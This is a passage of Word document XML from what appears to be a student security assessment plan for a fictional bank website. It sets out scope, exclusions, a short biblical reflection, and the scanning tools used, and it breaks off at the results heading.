    <w:p w14:paraId="6A1DD846" w14:textId="4B8CFF4E" w:rsidR="006C4885" w:rsidRDefault="006C4885" w:rsidP="00AE4491">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc46402709"/>
      <w:r>
        <w:t xml:space="preserve">File System </w:t>
      </w:r>
      <w:r w:rsidR="00AE4491">
        <w:t>Application Component</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="71055AD0" w14:textId="62D6ED14" w:rsidR="002841CA" w:rsidRDefault="0030342C" w:rsidP="0030342C">
      <w:r>
        <w:t xml:space="preserve">Logging is a general recommendation for any web server. It ensures that actions and transactions become records of proof. Logging can be come expensive in storage space, so having </w:t>
      </w:r>
      <w:bookmarkStart w:id="9" w:name="_Toc46402710"/>
      <w:r>
        <w:t xml:space="preserve">a storage area network can be helpful. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:t>Hosting backup of software applications and files</w:t>
      </w:r>
      <w:r w:rsidR="0094305D">
        <w:t xml:space="preserve"> on a storage area network helps in the event of disaster recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7579E029" w14:textId="77777777" w:rsidR="002841CA" w:rsidRDefault="002841CA" w:rsidP="002841CA"/>
    <w:p w14:paraId="1D497C37" w14:textId="379FBA19" w:rsidR="00AE4491" w:rsidRDefault="0094305D" w:rsidP="0094305D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0094305D">
        <w:lastRenderedPageBreak/>
        <w:t>2.2.5 Remote Device Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B31100" w14:textId="3D5735CA" w:rsidR="0094305D" w:rsidRPr="0094305D" w:rsidRDefault="00EA3603" w:rsidP="0094305D">
      <w:r>
        <w:t xml:space="preserve"> Tablets,  phones, and pcs for Insecure Bankcorp employees can connect using vpn through their internal intranet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272F00AE" w14:textId="77777777" w:rsidR="00817306" w:rsidRDefault="00F74A6A" w:rsidP="00817306">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc46402711"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Assessment </w:t>
      </w:r>
      <w:r w:rsidR="00817306">
        <w:t>Assumptions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="5139DD9D" w14:textId="77777777" w:rsidR="00A5661E" w:rsidRDefault="00A5661E" w:rsidP="00A5661E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc46402712"/>
      <w:r>
        <w:t xml:space="preserve">Components Included in the </w:t>
      </w:r>
      <w:r w:rsidR="00F74A6A">
        <w:t>Assessment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="33F7B809" w14:textId="77777777" w:rsidR="00770BF8" w:rsidRPr="00770BF8" w:rsidRDefault="00770BF8" w:rsidP="007B065F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415C0F9B" w14:textId="15944321" w:rsidR="00E4742A" w:rsidRDefault="007B065F" w:rsidP="00FF2908">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770BF8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>All code</w:t>
      </w:r>
      <w:r w:rsidR="00094F9D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="003A7D7F" w:rsidRPr="00DF7706">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>www.insecure-banking</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003A7D7F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.com </w:t>
      </w:r>
      <w:r w:rsidRPr="00770BF8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">will be included in the </w:t>
      </w:r>
      <w:r w:rsidR="00F74A6A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>assessment/</w:t>
      </w:r>
      <w:r w:rsidR="00850072" w:rsidRPr="00770BF8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>verification</w:t>
      </w:r>
      <w:r w:rsidRPr="00770BF8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505867EE" w14:textId="2351DEBD" w:rsidR="003A7D7F" w:rsidRDefault="003A7D7F" w:rsidP="00FF2908">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">All website configuration of </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00DF7706">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>www.insecure-banking</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.com will be included.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5898BD6C" w14:textId="1B3026A7" w:rsidR="00AA73D1" w:rsidRPr="00FF2908" w:rsidRDefault="00AA73D1" w:rsidP="00FF2908">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Linux Platform and Apache web server software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CF7B17" w14:textId="77777777" w:rsidR="00A5661E" w:rsidRPr="00BF500B" w:rsidRDefault="00A5661E" w:rsidP="00A5661E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc46402713"/>
      <w:r w:rsidRPr="00BF500B">
        <w:t xml:space="preserve">Components Excluded from the </w:t>
      </w:r>
      <w:r w:rsidR="00F74A6A">
        <w:t>Assessment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="49B1C34C" w14:textId="71B4C7AF" w:rsidR="0060698B" w:rsidRDefault="00AA73D1" w:rsidP="007B065F">
      <w:r>
        <w:t>The following items are not within the scope of this assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5D7D49" w14:textId="5589B296" w:rsidR="00AA73D1" w:rsidRDefault="00AA73D1" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Routers,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E950F31" w14:textId="6B34D074" w:rsidR="00AA73D1" w:rsidRDefault="00AA73D1" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Firewalls,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642DE54E" w14:textId="3AD02DFE" w:rsidR="00AA73D1" w:rsidRDefault="00AA73D1" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>IDS,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8144C2" w14:textId="53DCFCCE" w:rsidR="00AA73D1" w:rsidRDefault="00AA73D1" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Databases,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDB432D" w14:textId="6FEA35B2" w:rsidR="00AA73D1" w:rsidRDefault="00AA73D1" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Security on remote devices,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071AE661" w14:textId="7511F44B" w:rsidR="00AA73D1" w:rsidRDefault="00AA73D1" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Authentication schemas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7444C61D" w14:textId="7DB6A759" w:rsidR="00AA73D1" w:rsidRDefault="00AA73D1" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Authorization mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633EF70B" w14:textId="5BFE3CE7" w:rsidR="00AA73D1" w:rsidRDefault="00AA73D1" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Physical security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24241EB3" w14:textId="746F0A7E" w:rsidR="00522B12" w:rsidRDefault="00522B12" w:rsidP="00522B12">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc46402714"/>
      <w:r>
        <w:t>Other Assumptions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="18BA7C51" w14:textId="77777777" w:rsidR="00522B12" w:rsidRPr="001A214E" w:rsidRDefault="00522B12" w:rsidP="00522B12">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42F6E91D" w14:textId="61861DD7" w:rsidR="003A7D7F" w:rsidRPr="00121825" w:rsidRDefault="00452BA5" w:rsidP="00121825">
      <w:r w:rsidRPr="00121825">
        <w:t>Access to web servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E4579E" w14:textId="5A778F59" w:rsidR="00452BA5" w:rsidRPr="00121825" w:rsidRDefault="00452BA5" w:rsidP="00121825">
      <w:r w:rsidRPr="00121825">
        <w:t>Access to log files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7330AD33" w14:textId="1C1C97A2" w:rsidR="00452BA5" w:rsidRPr="00121825" w:rsidRDefault="00452BA5" w:rsidP="00121825">
      <w:r w:rsidRPr="00121825">
        <w:t>Availability of internal resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3280ACE2" w14:textId="77777777" w:rsidR="00452BA5" w:rsidRDefault="00452BA5" w:rsidP="00522B12">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F974217" w14:textId="77777777" w:rsidR="002E2027" w:rsidRDefault="002E2027" w:rsidP="002E2027">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc46402715"/>
      <w:r>
        <w:t xml:space="preserve">Biblical </w:t>
      </w:r>
      <w:r w:rsidR="00744015">
        <w:t>Principles</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="28CF3CE8" w14:textId="77777777" w:rsidR="002E2027" w:rsidRPr="001A214E" w:rsidRDefault="002E2027" w:rsidP="002E2027">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="569849B0" w14:textId="7BE2669A" w:rsidR="002E2027" w:rsidRPr="00121825" w:rsidRDefault="00121825" w:rsidP="00522B12">
      <w:r w:rsidRPr="00121825">
        <w:t>Assessment and assumption of components included help narrow down the report on specifics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37872359" w14:textId="224C5CCE" w:rsidR="00121825" w:rsidRPr="00121825" w:rsidRDefault="00121825" w:rsidP="00522B12">
      <w:r w:rsidRPr="00121825">
        <w:t>Biblical scripture has a similar passage in the book of Matthew. In the book of Matthew, it is recommended to take the narrow gate over the wide gate. The wide gate is broad and can lead to many other paths. The wide gate is the way most people choose. In the same way looking for broad and general assessments while helpful may lead to missing important details. The narrow gate symbolizes the difficult path</w:t>
      </w:r>
      <w:r>
        <w:t>. However difficult it is rewarding</w:t>
      </w:r>
      <w:r w:rsidRPr="00121825">
        <w:t xml:space="preserve"> because it leads to the truth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537E7FA6" w14:textId="36F3D726" w:rsidR="00121825" w:rsidRDefault="00121825" w:rsidP="00522B12">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4391B076" w14:textId="2633913F" w:rsidR="00121825" w:rsidRPr="00121825" w:rsidRDefault="00121825" w:rsidP="00522B12">
      <w:r w:rsidRPr="00121825">
        <w:t>“Enter by the narrow gate. For the gate is wide and the way is easy that leads to destruction, and those who enter by it are many. For the gate is narrow and the way is hard that leads to life, and those who find it are few.” (Matthew 7:13-14, NLT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4FD16F" w14:textId="77777777" w:rsidR="001A214E" w:rsidRDefault="001A214E" w:rsidP="001A214E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc46402716"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Assessment Approach</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="302269C4" w14:textId="77777777" w:rsidR="001A214E" w:rsidRDefault="001A214E" w:rsidP="001A214E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc46402717"/>
      <w:r>
        <w:t>Security Architecture Review</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="334040E5" w14:textId="77777777" w:rsidR="001A214E" w:rsidRDefault="001A214E" w:rsidP="001A214E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43066FFA" w14:textId="77777777" w:rsidR="001A214E" w:rsidRDefault="001A214E" w:rsidP="001A214E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The security architecture review consists in a review of the application architecture, which is determined by customer-supplied diagrams and/or interviews. </w:t>
      </w:r>
      <w:r w:rsidR="004C2CE5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>However, a full review of the architecture is out of scope in this assessment. The high-level diagram is provided for clarification purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69029B0A" w14:textId="77777777" w:rsidR="001A214E" w:rsidRPr="009107BE" w:rsidRDefault="001A214E" w:rsidP="001A214E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2402CAF1" w14:textId="77777777" w:rsidR="001A214E" w:rsidRDefault="001A214E" w:rsidP="001A214E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc46402718"/>
      <w:r>
        <w:t>Web Server Security Scan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="1A304024" w14:textId="77777777" w:rsidR="001A214E" w:rsidRDefault="001A214E" w:rsidP="001A214E"/>
    <w:p w14:paraId="48196E95" w14:textId="46400D35" w:rsidR="001A214E" w:rsidRPr="00083779" w:rsidRDefault="001A214E" w:rsidP="001A214E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A high-level assessment of the web server security is performed using automated tooling and manual inspection. This includes the web server software (e.g., Apache, IIS) and the operating system. The tool</w:t>
      </w:r>
      <w:r w:rsidR="002E4009">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilized in the automated scan</w:t>
      </w:r>
      <w:r w:rsidR="002E4009">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D355F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is Splunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B42B3D" w14:textId="77777777" w:rsidR="001A214E" w:rsidRDefault="001A214E" w:rsidP="001A214E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc46402719"/>
      <w:r>
        <w:t>Dynamic Vulnerability Scan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EB8639" w14:textId="77777777" w:rsidR="001A214E" w:rsidRDefault="001A214E" w:rsidP="001A214E"/>
    <w:p w14:paraId="7A8901FC" w14:textId="250DA26B" w:rsidR="001A214E" w:rsidRDefault="001A214E" w:rsidP="001A214E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Dynamic scanning </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> performed at OWASP ASVS Level 1A using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the following tool</w:t>
      </w:r>
      <w:r w:rsidR="0086611E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751E131C" w14:textId="77777777" w:rsidR="001A214E" w:rsidRPr="001A214E" w:rsidRDefault="001A214E" w:rsidP="001A214E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE63404" w14:textId="29FCBA14" w:rsidR="00247C2E" w:rsidRPr="00247C2E" w:rsidRDefault="00247C2E" w:rsidP="001A214E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247C2E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7EFA8F" w14:textId="6047326F" w:rsidR="00247C2E" w:rsidRPr="00247C2E" w:rsidRDefault="00247C2E" w:rsidP="001A214E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247C2E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nikto,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2666C243" w14:textId="0A7FDE73" w:rsidR="00247C2E" w:rsidRPr="00247C2E" w:rsidRDefault="00247C2E" w:rsidP="001A214E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247C2E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dirbuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66859FE4" w14:textId="77777777" w:rsidR="00247C2E" w:rsidRPr="009107BE" w:rsidRDefault="00247C2E" w:rsidP="001A214E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA22435" w14:textId="77777777" w:rsidR="001A214E" w:rsidRPr="009107BE" w:rsidRDefault="001A214E" w:rsidP="001A214E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The results of the scan can be found in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reference One</w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. A summary of the results of the scan can be found in this document in section “Appendix B – Dynamic Scan Findings”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1053E863" w14:textId="77777777" w:rsidR="001A214E" w:rsidRDefault="001A214E" w:rsidP="001A214E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E06DD5A" w14:textId="77777777" w:rsidR="001A214E" w:rsidRDefault="001A214E" w:rsidP="001A214E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc46402720"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Source Code Scan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6866B928" w14:textId="77777777" w:rsidR="001A214E" w:rsidRDefault="001A214E" w:rsidP="001A214E"/>
    <w:p w14:paraId="47DA3049" w14:textId="77777777" w:rsidR="001A214E" w:rsidRPr="009107BE" w:rsidRDefault="001A214E" w:rsidP="006C341F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Static scanning </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> performed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>using a manual code review process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B4AEC" w14:textId="77777777" w:rsidR="001A214E" w:rsidRDefault="001A214E" w:rsidP="001A214E"/>
    <w:p w14:paraId="4CF5F083" w14:textId="77777777" w:rsidR="001A214E" w:rsidRDefault="001A214E" w:rsidP="001A214E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc46402721"/>
      <w:r>
        <w:t>Out of Scope Items</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="1218B4F3" w14:textId="431CA592" w:rsidR="001A214E" w:rsidRDefault="003D355F" w:rsidP="003D355F">
      <w:pPr>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:t>The following items are out of scope items in the assessment.  Redundant edge routers for load balancing. Firewalls and intrusion detection systems are also considered out of scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D08A549" w14:textId="51B0F484" w:rsidR="003D355F" w:rsidRDefault="003D355F" w:rsidP="003D355F">
      <w:pPr>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:t>Any databases the web application would write to.  Security on remote devices that connected to the web server. Authentication or authorization mechanisms configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA13EC1" w14:textId="223D36E0" w:rsidR="003D355F" w:rsidRDefault="003D355F" w:rsidP="003D355F">
      <w:pPr>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:t>The physical security of the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C3E45C" w14:textId="77777777" w:rsidR="001A214E" w:rsidRPr="00F90273" w:rsidRDefault="001A214E" w:rsidP="001A214E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D1C4E81" w14:textId="77777777" w:rsidR="001A214E" w:rsidRPr="001A214E" w:rsidRDefault="001A214E" w:rsidP="001A214E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11FC5D5E" w14:textId="77777777" w:rsidR="00817306" w:rsidRDefault="00F74A6A" w:rsidP="00817306">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc46402722"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Assessment/Verification </w:t>
      </w:r>
      <w:r w:rsidR="001A214E">
        <w:t>Results</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidR="00997BF5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1996A2F6" w14:textId="77777777" w:rsidR="00E4742A" w:rsidRPr="00EC559F" w:rsidRDefault="00E4742A" w:rsidP="00EC559F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42F6799B" w14:textId="77777777" w:rsidR="00EC559F" w:rsidRDefault="00EC559F" w:rsidP="0002448A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc46402723"/>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Summary of </w:t>
      </w:r>
      <w:r w:rsidR="00152D4B">
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Test Results</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
